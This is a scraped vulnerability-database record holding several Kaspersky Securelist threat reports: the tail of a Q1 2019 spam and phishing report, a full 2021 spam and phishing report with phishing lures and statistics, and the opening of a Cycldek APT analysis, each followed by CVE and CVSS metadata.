computer.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143418/Spam-report-Q1-2019-15.png>)\n\n### Attacks on the banking sector\n\nBanks are firmly established as top phishing targets. Scammers try to make their fake messages as believable as possible by substituting legitimate domains into the sender's address, copying the layout of official emails, devising plausible pretexts, etc. In Q1, phishers exploited high-profile events to persuade victims of the legitimacy of the received message \u2014 for example, they inserted into the message body a phrase about the Christchurch terror attack. The attackers hoped that this, plus the name of a New Zealand bank as the sender, would add credibility to the message. The email itself stated that the bank had introduced some new security features that required an update of the account details to use.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143441/Spam-report-Q1-2019-16.png>)\n\nThe link took the user to a phishing site mimicking the login page of the New Zealand bank in question. All data entered on the site was transferred to the cybercriminals when the Login button was clicked/tapped.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143603/Spam-report-Q1-2019-17.png>)\n\n## Statistics: spam\n\n### Proportion of spam in mail traffic\n\n_Proportion of spam in global mail traffic, Q4 2018 \u2013 Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14144003/spam-world-en.png>)\n\nIn Q1 2019, the highest percentage of spam was recorded in March at 56.33%. The average percentage of spam in global mail traffic came to 55.97%, which is almost identical (+0.07 p.p.) to Q4 2018.\n\n_Proportion of spam in Runet mail traffic, Q4 2018 \u2013 Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143939/spam-russia-en.png>)\n\nPeak spam in traffic in the Russian segment of the Internet came in January (56.19%). The average value for the quarter was 55.48%, which is 2.01 p.p. higher than in Q4.\n\n### Sources of spam by country\n\n_Sources of spam by country, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143819/countries-source-en.png>)\n\nAs is customary, the top spam-originating countries were China (15.82%) and the US (12.64%); the other Top 3 regular, Germany, was down to fifth place in Q1 (5.86%), ceding third place to Russia (6.98%) and allowing Brazil (6.95%) to sneak into fourth. In sixth place came France (4.26%), followed by Argentina (3.42%), Poland (3.36%), and India (2.58%). The Top 10 is rounded off by Vietnam (2.18%).\n\n### Spam email size\n\n_Spam email size, Q4 2018 \u2013 Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143628/spam-size.png>)\n\nIn Q1 2019, the share of very small emails (up to 2 KB) in spam increased against Q4 2018 by 7.14 p.p. to 73.98%. The share of 2\u20135 KB messages fell to 8.27% (down 3.15 p.p.). 10\u201320 KB messages made up 5.11% of spam traffic, up 1.08 p.p. on Q4. The share of messages sized 20\u201350 KB amounted to 3.00% (0.32 p.p. growth against Q4 2018).\n\n### Malicious attachments: malware families\n\n_TOP 10 malicious families in mail traffic, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143654/families.png>)\n\nIn Q1 2019, the most common malware in mail traffic turned out to be Exploit.MSOffice.CVE-2017-11882, with a share of 7.73%. In second place was Backdoor.Win32.Androm (7.62%), and Worm.Win32.WBVB (4.80%) took third. Fourth position went to another exploit for Microsoft Office in the shape of Exploit.MSOffice.CVE-2018-0802 (2.81%), while Trojan-Spy.Win32.Noon (2.42%) rounded off the Top 5.\n\n### Countries targeted by malicious mailshots\n\n_Countries targeted by malicious mailshots, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143848/countries-victims-en.png>)\n\nFirst place in the Top 3 countries by number of Mail Anti-Virus triggers yet again went to Germany (11.88%). It is followed by Vietnam (6.24%) in second position and Russia (5.70%) in third.\n\n## Statistics: phishing\n\nIn Q1 2019, the Anti-Phishing system prevented **111,832,308** attempts to direct users to scam websites. **12.11%** of all Kaspersky Lab users worldwide experienced an attack.\n\n### Attack geography\n\nIn Q1 2019, as in the previous quarter, the country with the largest share of users attacked by phishers was Brazil with 21.66%, up 1.53 p.p.\n\n_Geography of phishing attacks, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143915/map-en.png>)\n\nIn second place up from eighth was Australia (17.20%), adding 2.42 p.p. but still 4.46 p.p. behind top-place Brazil. Spain rose one position to 16.96% (+0.87 p.p.), just above Portugal (16.86%) and Venezuela (16.72%) propping up the Top 5.\n\n**Country** | **%*** \n---|--- \nBrazil | 21.66 \nAustralia | 17.20 \nSpain | 16.96 \nPortugal | 16.81 \nVenezuela | 16.72 \nGreece | 15.86 \nAlbania | 15.11 \nEcuador | 14.99 \nRwanda | 14.89 \nGeorgia | 14.76 \n \n*Share of users on whose computers Anti-Phishing was triggered out of all Kaspersky Lab users in the country\n\n### Organizations under attack\n\n_The rating of attacks by phishers on different categories of organizations is based on detections by Kaspersky Lab's Anti-Phishing component. It is activated every time the user attempts to open a phishing page, either by clicking a link in an email or a social media message, or as a result of malware activity. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat._\n\nThis quarter, the banking sector remains in first place by number of attacks \u2014 the share of attacks on credit organizations increased by 5.23 p.p. against Q4 last year to 25.78%.\n\n_Distribution of organizations subjected to phishing attacks by category, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/20091310/companies-en-1.png>)\n\nSecond place went to global Internet portals (19.82%), and payment systems \u2014 another category that includes financial institutions \u2014 finished third (17.33%).\n\n## Conclusion\n\nIn Q1 2019, the average share of spam in global mail traffic rose by **0.06** p.p. to **55.97**%, and the Anti-Phishing system prevented more than **111,832,308** redirects to phishing sites, up **35,220,650** in comparison with the previous reporting period.\n\nAs previously, scammers wasted no opportunity to exploit high-profile media events for their own purposes (Apple product launch, New Zealand terror attack). Sextortion has not gone away \u2014 on the contrary, to make such schemes more believable, cybercriminals have come up with new cover stories about the message senders.\n\nOn top of all that, attackers continue to use social networks to achieve their goals, and have launched advertising campaigns using celebrities to extend their reach.", "cvss3": {}, "published": "2019-05-15T10:00:23", "type": "securelist", "title": "Spam and phishing in Q1 2019", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2019-05-15T10:00:23", "id": "SECURELIST:45BAFC60F3E2EFDD0D35C99D042559B4", "href": "https://securelist.com/spam-and-phishing-in-q1-2019/90795/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-14T15:27:23", "description": "\n\n## Figures of the year\n\nIn 2021:\n\n * 45.56% of e-mails were spam\n * 24.77% of spam was sent from Russia with another 14.12% from Germany\n * Our Mail Anti-Virus blocked 148 173 261 malicious attachments sent in e-mails\n * The most common malware family found in attachments were Agensla Trojans\n * Our Anti-Phishing system blocked 253 365 212 phishing links\n * Safe Messaging blocked 341 954 attempts to follow phishing links in messengers\n\n## Trends of the year\n\n### How to make an unprofitable investment with no return\n\nThe subject of investments gained significant relevance in 2021, with banks and other organizations actively promoting investment and brokerage accounts. Cybercriminals wanted in on this trend and tried to make their &quot;investment projects&quot; look as alluring as possible. Scammers used the names of successful individuals and well-known companies to attract attention and gain the trust of investors. That&#x27;s how cybercriminals posing as Elon Musk or the Russian oil and gas company Gazprom Neft tricked Russian-speaking victims into parting with small sums of money in the hope of landing a pot of gold later. In some cases, they&#x27;d invite the &quot;customer&quot; to have a consultation with a specialist in order to come across as legit. The outcome would still be the same: the investor would receive nothing in return for giving their money to the scammers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094031/Spam_report_2021_01.png>)\n\nSimilar schemes targeting English speakers were also intensively deployed online. Scammers encouraged investment in both abstract securities and more clearly outlined projects, such as oil production. In both cases, victims received nothing in return for their money.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094100/Spam_report_2021_02.png>)\n\nAnother trick was to pose as a major bank and invite victims to participate in investment projects. In some instances, scammers emphasized stability and the lack of risk involved for the investor, as well as the status of the company they were posing as. In order to make sure the investors didn&#x27;t think the process sounded too good to be true, victims were invited to take an online test or fill out an application form which would ostensibly take some time to be &quot;processed&quot;.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094120/Spam_report_2021_03.png>)\n\n### Films and events &quot;streamed&quot; on fake sites: not seeing is believing!\n\nOnline streaming of hyped film premieres and highly anticipated sports events was repeatedly used to lure users in 2021. Websites offering free streaming of the new [Bond](<https://www.kaspersky.com/blog/bond-cybersecurity-in-craig-era/42733/>) movie or the latest Spider-Man film [appeared online](<https://threatpost.com/spider-man-movie-credit-card-harvesting/177146/>) shortly ahead of the actual release date, continuing to pop up until the eve of the official premiere. Scammers used various ploys to try and win the victim&#x27;s trust. They used official advertisements and provided a synopsis of the film on the website.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094149/Spam_report_2021_04.png>)\n\nHowever, the promised free stream would be interrupted before the film even got going. Visitors to the site would be shown a snippet of a trailer or a title sequence from one of the major film studios, which could have absolutely nothing to do with the film being used as bait. Visitors would then be asked to register on the website in order to continue watching. The same outcome was observed when users tried to download or stream sports events or other content, the only difference was visitors might not be able to watch anything without registering. Either way the registration was no longer free. The registration fee would only be a symbolic figure according to the information provided on the website, but any amount of money could be debited once the user had entered their bank card details, which would immediately fall into the hands of attackers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094211/Spam_report_2021_05.png>)\n\n### A special offer from cybercriminals: try hand at spamming\n\nMore and more often, scam websites posing as large companies that promise huge cash prizes in return for completing a survey have begun setting out stricter criteria for those who want a chance to win. After answering a few basic questions, &quot;prize winners&quot; are required to share information about the prize draw with a set number of their contacts via a messaging app. Only then is the victim invited to pay a small &quot;commission fee&quot; to receive their prize. This means the person who completes the full task not only gives the scammers money, but also recommends the scam to people in their list of contacts. Meanwhile, friends see the ad is from someone they know rather than some unknown number, which could give them a false sense of security, encouraging them to follow the link and part with their money in turn.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094234/Spam_report_2021_06.png>)\n\n### Hurry up and lose your account: phishing in the corporate sector\n\nThe main objective for scammers in an attack on an organization remained getting hold of corporate account credentials. The messages that cybercriminals sent to corporate e-mail addresses were increasingly disguised as business correspondence or notifications about work documents that required the recipient&#x27;s attention. The attackers&#x27; main objective was to trick the victim into following the link to a phishing page for entering login details. That&#x27;s why these e-mails would contain a link to a document, file, payment request, etc., where some sort of urgent action supposedly needed to be taken.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094310/Spam_report_2021_07.png>)\n\nThe fake notification would often concern some undelivered messages. They needed to be accessed via some sort of &quot;email Portal&quot; or another similar resource.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094341/Spam_report_2021_08.png>)\n\nAnother noticeable phishing trend targeting the corporate sector was to exploit popular cloud services as bait. Fake notifications about meetings in Microsoft Teams or a message about important documents sent via SharePoint for salary payment approval aimed to lower the recipient&#x27;s guard and prompt them to enter the username and password for their corporate account.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094433/Spam_report_2021_09.png>)\n\n### COVID-19\n\n#### Scams\n\nThe subject of COVID-19 which dominated newsfeeds throughout the entire year was exploited by scammers in various schemes. In particular, attackers continued sending out messages about compensation and subsidies related to restrictions imposed to combat the pandemic, as this issue remained top of the agenda. The e-mails contained references to laws, specific measures imposed and the names of governmental organizations to make them sound more convincing. To receive the money, the recipient supposedly just needed to pay a small commission fee to cover the cost of the transfer. In reality, the scammers disappeared after receiving their requested commission along with the victim&#x27;s bank card details.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094510/Spam_report_2021_10.png>)\n\nThe sale of fake COVID vaccination passes and QR codes became another source of income for cybercriminals. The fraudsters emphasized how quickly they could produce forged documents and personalized QR codes. These transactions are dangerous in that, on the one hand, the consequences can be criminal charges in some countries, and on the other hand, scammers can easily trick the customer. There&#x27;s no guarantee that the code they&#x27;re selling will work. Another risk is that the buyer needs to reveal sensitive personal information to the dealer peddling the certs in order to make the transaction.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094550/Spam_report_2021_11.png>)\n\n#### The corporate sector\n\nCOVID-19 remained a relevant topic in phishing e-mails targeting the business sector. One of the main objectives in these mailing operations was to convince recipients to click a link leading to a fake login page and enter the username and password for their corporate account. Phishers used various ploys related to COVID-19. In particular, we detected notifications about compensation allocated by the government to employees of certain companies. All they needed to do in order to avail of this promised support was to &quot;confirm&quot; their e-mail address by logging in to their account on the scam website.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094621/Spam_report_2021_12.png>)\n\nAnother malicious mailshot utilized e-mails with an attached HTML file called &quot;Covid Test Result&quot;. Recipients who tried to open the file were taken to a scam website where they were prompted to enter the username and password for their Microsoft account.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094648/Spam_report_2021_13.png>)\n\nThe &quot;important message about vaccination&quot; which supposedly lay unread in a recipient&#x27;s inbox also contained a link to a page belonging to attackers requesting corporate account details.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094709/Spam_report_2021_14.png>)\n\nAnother type of attack deployed e-mails with malicious attachments. Shocking news, such as immediate dismissal from work accompanied by the need to take urgent action and read a &quot;2 months salary receipt&quot; were intended to make the recipient open the attachment with the malicious object as quickly as possible.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094735/Spam_report_2021_15.png>)\n\n#### COVID-19 vaccination\n\nWhile authorities in various countries gradually rolled out vaccination programs for their citizens, cybercriminals exploited people&#x27;s desire to protect themselves from the virus by getting vaccinated as soon as possible. For instance, some UK residents received an e-mail claiming to be from the country&#x27;s National Health Service. In it, the recipient was invited to be vaccinated, having first confirmed their participation in the program by clicking on the link. In another mailing, scammers emphasized that only people over the age of 65 had the opportunity to get vaccinated.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094800/Spam_report_2021_16.png>)\n\nIn both cases, a form had to be filled out with personal data to make a vaccination appointment; and in the former case, the phishers also asked for bank card details. If the victim followed all the instructions on the fake website, they handed their account and personal data over to the attackers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094834/Spam_report_2021_17.png>)\n\nAnother way to gain access to users&#x27; personal data and purse strings was through fake vaccination surveys. Scammers sent out e-mails in the name of large pharmaceutical companies producing COVID-19 vaccines, or posing as certain individuals. The e-mail invited recipients to take part in a small study.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094909/Spam_report_2021_18.png>)\n\nThe scammers promised gifts or even monetary rewards to those who filled out the survey. After answering the questions, the victim would be taken to a &quot;prize&quot; page but told to pay a small necessary &quot;commission fee&quot; in order to receive it. The scammers received the money, but the victim got nothing as a result.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094931/Spam_report_2021_19.png>)\n\nWe also observed a mailing last year which exploited the subject of vaccination to spread malware. The subject lines of these e-mails were randomly selected from various sources. The attached document contained a macro for running a PowerShell script detected as [Trojan.MSOffice.SAgent.gen](<https://threats.kaspersky.com/en/threat/Trojan.MSOffice.SAgent/>). SAgent malware is used at the initial stage of an attack to deliver other malware to the victim&#x27;s system.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094958/Spam_report_2021_20.png>)\n\n## Statistics: spam\n\n### Share of spam in mail traffic\n\nOn average, 45.56% of global mail traffic was spam in 2021. The figure fluctuated over the course of the year.\n\n_Share of spam in global e-mail traffic, 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101352/01-en-spam-report-2021.png>))_\n\nWe observed the largest percentage of spam in the second quarter (46.56%), which peaked in June (48.03%). The fourth quarter was the quietest period (44.54%), with only 43.70% of e-mails detected as spam in November.\n\n### Source of spam by country or region\n\nLike in 2020, the most spam in 2021 came from Russia (24.77%), whose share rose by 3.5 p.p. Germany, whose share rose 3.15 p.p. to 14.12%, remained in second place. They were followed by the United States (10.46%) and China (8.73%), who&#x27;ve also stayed put in third and fourth place. The share of spam sent from the United States barely moved, while China&#x27;s rose 2.52 p.p. compared to 2020.\n\n_Sources of spam by country or region in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101419/03-en-spam-report-2021.png>))_\n\nThe Netherlands (4.75%) moved up to fifth place, with its share rising by just 0.75 p.p. to overtake France (3.57%), whose share went in the opposite direction. Spain (3.00%) and Brazil (2.41%) also swapped places, and the top ten was rounded out by the same two countries as 2020, Japan (2,36%) and Poland (1.66%). In total, over three quarters of the world&#x27;s spam was sent from these ten countries.\n\n### Malicious mail attachments\n\n_Dynamics of Mail Anti-Virus triggerings in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101444/04-en-spam-report-2021.png>))_\n\nIn 2021, the Kaspersky Mail Anti-Virus blocked 148 173 261 malicious e-mail attachments. May was the quietest month, when just over 10 million attachments were detected, i.e., 7.02% of the annual total. In contrast, October turned out to be the busiest month, when we recorded over 15 million attacks blocked by the Mail Anti-Virus, i.e., 10.24% of the annual total.\n\n#### Malware families\n\nThe attachments most frequently encountered and blocked by the antivirus in 2021 were Trojans from the [Agensla](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>) family, which steal login credentials stored in browsers as well as credentials from e-mail and FTP clients. Members of this family were found in 8.67% of the malicious files detected, which is 0.97 p.p. up on 2020. Second place was taken by [Badun](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Badun/>) Trojans (6.31%), distributed in archives and disguised as electronic documents. In another 3.95% of cases, our products blocked attacks exploiting the [CVE-2017-11882](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2017-11882/>) vulnerability in Microsoft Equation Editor, which remains significant for the fourth year in a row. Almost the same amount of attachments belonged to the [Taskun](<https://threats.kaspersky.com/en/threat/Trojan.MSIL.Taskun/>) (3.93%) family, which create malicious tasks in Windows Task Scheduler.\n\n_TOP 10 malware families spread by e-mail attachments in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101509/05-en-spam-report-2021.png>))_\n\nThe fifth and tenth most popular forms of malware sent in attachments were Noon spyware Trojans for [any version](<https://threats.kaspersky.com/en/threat/Trojan-Spy.MSIL.Noon/>) of Windows OS (3.63%) and [32-bit versions](<https://threats.kaspersky.com/en/threat/Trojan-Spy.Win32.Noon/>) (1.90%), respectively. Malicious [ISO](<https://threats.kaspersky.com/en/threat/Trojan.Win32.ISO/>) disk images accounted for 3.21% of all attachments blocked, while SAgent Trojans contributed 2.53%. Eighth place was taken by another exploited vulnerability in Equation Editor called [CVE-2018-0802](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2018-0802/>) (2.38%), while in the ninth place were [Androm](<https://threats.kaspersky.com/en/threat/Backdoor.MSIL.Androm/>) backdoors (1.95%), which are mainly used to deliver different types of malware to an infected system.\n\n_TOP 10 types of malware spread by e-mail attachments in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101548/06-en-spam-report-2021.png>))_\n\nThe ten most common verdicts in 2021 coincided with the TOP 10 families. This means attackers mainly spread one member of each family.\n\n#### Countries and regions targeted by malicious mailings\n\nIn 2021, the Mail Anti-Virus most frequently blocked attacks on devices used in Spain (9.32%), whose share has risen for the second year in a row. Russia rose to second place (6.33%). The third largest number of malicious files were blocked in Italy (5.78%).\n\n_Countries and regions targeted by malicious mailshots in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101614/07-en-spam-report-2021.png>))_\n\nGermany (4.83%) had been the most popular target in phishing attacks for several years until 2020. It dropped to fifth place in 2021, giving way to Brazil (4.84%) whose share was just 0.01 p.p higher than Germany&#x27;s. They&#x27;re followed in close succession by Mexico (4.53%), Vietnam (4.50%) and the United Arab Emirates (4.30%), with the same countries recorded in 2020 rounding out the TOP 10 targets: Turkey (3.37%) and Malaysia (2.62%).\n\n## Statistics: phishing\n\nIn 2021, our Anti-Phishing system blocked 253 365 212 phishing links. In total, 8.20% of Kaspersky users in different countries and regions around the world have faced at least one phishing attack.\n\n### Map of phishing attacks\n\n_Geography of phishing attacks in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101643/08-en-spam-report-2021.png>))_\n\nUsers living in Brazil made the most attempts to follow phishing links, with the Anti-Phishing protection triggered on devices belonging to 12.39% of users in this country. Brazil was also the top phishing target in 2020. France rose to second place (12.21%), while Portugal (11.40%) remained third. It&#x27;s worth noting that phishing activity was so rampant in France last year that the country topped the leaderboard of targeted users in the first quarter.\n\nMongolia (10.98%) found itself in forth place for the number of users attacked in 2021, making it onto this list for the first time. The countries which followed in close succession were R\u00e9union (10.97%), Brunei (10.89%), Madagascar (10.87%), Andorra (10.79%), Australia (10.74%), and Ecuador (10.73%).\n\nTOP 10 countries by share of users targeted in phishing attacks:\n\n**Country** | **Share of attacked users*** \n---|--- \nBrazil | 12.39% \nFrance | 12.21% \nPortugal | 11.40% \nMongolia | 10.98% \nR\u00e9union | 10.97% \nBrunei | 10.89% \nMadagascar | 10.87% \nAndorra | 10.79% \nAustralia | 10.74% \nEcuador | 10.73% \n \n_* Share of users on whose devices Anti-Phishing was triggered out of all Kaspersky users in the country in 2021_\n\n### Top-level domains\n\nMost of the phishing websites blocked in 2021 used a .com domain name like in 2020, whose share rose 7.19 p.p., reaching 31.55%. The second most popular domain name used by attackers was .xyz (13.71%), as those domains are cheap or even free to register. The third row on the list was occupied by the Chinese country-code domain .cn (7.14%). The Russian domain .ru (2.99%) fell to sixth place, although its share has grown since 2020. It now trails behind the domains .org (3.13%) and .top (3.08%), and is followed by the domain names .net (2.20%), .site (1.82%), and .online (1.56%). The list is rounded out by the low-cost .tk domain (1.17%) belonging to the island nation of Tokelau, which attackers are attracted to for the same reason they&#x27;re attracted to .xyz.\n\n_Most frequent top-level domains for phishing pages in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101710/09-en-spam-report-2021.png>))_\n\n### Organizations mimicked in phishing attacks\n\n_The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an e-mail message or on the web, as long as links to these pages are present in the Kaspersky database._\n\nThe demand for online shopping remained high in 2021, which is reflected in phishing trends: phishing pages were most frequently designed to mimic online stores (17.61%). These were closely followed by global Internet portals (17.27%) in second place. Payment systems (13.11%) climbed to third place, rising 4.7 p.p. to overtake banks (11.11%) and social networks (6.34%). Instant messengers (4.36%) and telecom companies (2.09%) stayed in sixth and seventh place, respectively, although their shares both fell. IT companies (2.00%) and financial services (1.90%) also held onto their places in the rating. The TOP 10 was rounded out by online games (1.51%), as attackers went after gamers more frequently than after users of delivery services in 2021.\n\n_Distribution of organizations most often mimicked by phishers, by category, 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101743/10-en-spam-report-2021.png>))_\n\n### Phishing in messengers\n\n_Statistics on messenger-based phishing are based on anonymized data from the Safe Messaging component of Kaspersky Internet Security for Android, voluntarily provided by users of this solution. Safe Messaging scans incoming messages and blocks attempts to follow any phishing or otherwise malicious links in them._\n\nIn 2021, Safe Messaging blocked 341 954 attempts to follow phishing links in various messengers. Most of these were links that users tried to follow from WhatsApp (90.00%). Second place was occupied by Telegram (5.04%), with Viber (4.94%) not far behind.\n\n_Distribution of links blocked by the Safe Messaging component, by messenger, 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101811/11-en-spam-report-2021.png>))_\n\nOn average, WhatsApp users attempted to follow phishing links 850 times a day. We observed the least phishing activity at the beginning of the year, while in December the weekly number of blocked links exceeded the 10 000 mark. We have observed a spike in phishing activity on WhatsApp in July, when the Trojan.AndroidOS.Whatreg.b, which is mainly used to register new WhatsApp accounts, also became more active. We can&#x27;t say for sure that there&#x27;s a connection between Whatreg activity and phishing in this messaging app, but it&#x27;s a possibility. We also observed another brief surge in phishing activity on the week from October 31 through to November 6, 2021.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08100059/Spam_report_2021_21.png>)\n\n**_Dynamics of phishing activity on WhatsApp in 2021 (weekly number of detected links shown)_**\n\nOn average, the Safe Messaging component detected 45 daily attempts to follow phishing links sent via Telegram. Similar to WhatsApp, phishing activity increased towards the end of the year.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08100143/Spam_report_2021_22.png>)\n\n**_Dynamics of phishing activity on Telegram in 2021 (weekly number of detected links shown)_**\n\nA daily average of 45 links were also detected on Viber, although phishing activity on this messenger dropped off towards the end of the year. However, we observed a peak in August 2021.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08100213/Spam_report_2021_23.png>)\n\n**_Dynamics of phishing activity on Viber in 2021 (weekly number of detected links shown)_**\n\n## Conclusion\n\nAs we had expected, the key trends from 2020 continued into 2021. Attackers actively exploited the subject of COVID-19 in spam e-mails, which remained just as relevant as it was a year earlier. Moreover, baits related to vaccines and QR codes \u2014 remaining two of the year&#x27;s main themes \u2014 were added to the bag of pandemic-related tricks. As expected, we continued to observe a variety of schemes devised to hack corporate accounts. In order to achieve their aims, attackers forged e-mails mimicking notifications from various online collaboration tools, sent out notifications about non-existent documents and similar business-related baits. There were also some new trends, such as the investment scam which is gaining momentum.\n\nThe key trends in phishing attacks and scams are likely to continue into the coming year. Fresh &quot;investment projects&quot; will replace their forerunners. &quot;Prize draws&quot; will alternate with holiday giveaways when there&#x27;s a special occasion to celebrate. Attacks on the corporate sector aren&#x27;t going anywhere either. Given remote and hybrid working arrangements are here to stay, the demand for corporate accounts on various platforms is unlikely to wane. The topic of COVID-19 vaccination status will also remain relevant. Due to the intensity of the measures being imposed in different countries to stop the spread of the virus, we&#x27;ll more than likely see a surge in the number of forged documents up for sale on the dark web, offering unrestricted access to public places and allowing holders to enjoy all the freedoms of civilization.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-09T10:00:28", "type": "securelist", "title": "Spam and phishing in 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2022-02-09T10:00:28", "id": "SECURELIST:2625ABE43A309D7E388C4F0EBCA62244", "href": "https://securelist.com/spam-and-phishing-in-2021/105713/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-03T11:50:54", "description": "\n\n## Key findings\n\nWhile investigating attacks related to a group named Cycldek post 2018, we were able to uncover various pieces of information on its activities that were not known thus far. In this blog post we aim to bridge the knowledge gap on this group and provide a more thorough insight into its latest activities and modus operandi. Here are some key insights that will be described in this publication:\n\n * Cycldek (also known as Goblin Panda and Conimes) has been active in the past two years, conducting targeted operations against governments in Southeast Asia.\n * Our analysis shows two distinct patterns of activity, indicating the group consists of two operational entities that are active under a mutual quartermaster.\n * We were able to uncover an extensive toolset for lateral movement and information stealing used in targeted networks, consisting of custom and unreported tools as well as living-off-the-land binaries.\n * One of the newly revealed tools is named USBCulprit and has been found to rely on USB media in order to exfiltrate victim data. This may suggest Cycldek is trying to reach air-gapped networks in victim environments or relies on physical presence for the same purpose.\n\n## Background\n\nCycldek is a long-known Chinese-speaking threat actor. Based on the group's past activity, it has a strong interest in Southeast Asian targets, with a primary focus on large organizations and government institutions in Vietnam. This is evident from a series of targeted campaigns that are publicly attributed to the group, as outlined below:\n\n * 2013 - indicators affiliated to the group were found in a network of a technology company operating in several sectors, as briefly [described](<https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-august-goblin-panda/>) by CrowdStrike.\n * 2014 - further accounts by CrowdStrike describe vast activity by the group against Southeast Asian organizations, most notably Vietnam. The campaigns made prominent use of Vietnamese-language lure documents, delivering commodity malware like PlugX, that was typically leveraged by Chinese-speaking actors.\n * 2017 - the group was witnessed launching attacks using RTF lure documents with political content related to Vietnam, dropping a variant of a malicious program named NewCore RAT, as [described](<https://www.fortinet.com/blog/threat-research/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations.html>) by Fortinet.\n * 2018 - attacks have been witnessed in government organizations across several Southeast Asian countries, namely Vietnam, Thailand and Laos, using a variety of tools and new TTPs. Those include usage of the Royal Road builder, developed versions of the NewCore RAT malware and other unreported implants. These were the focus of intel reports available to Kaspersky's Threat Intelligence Portal subscribers since 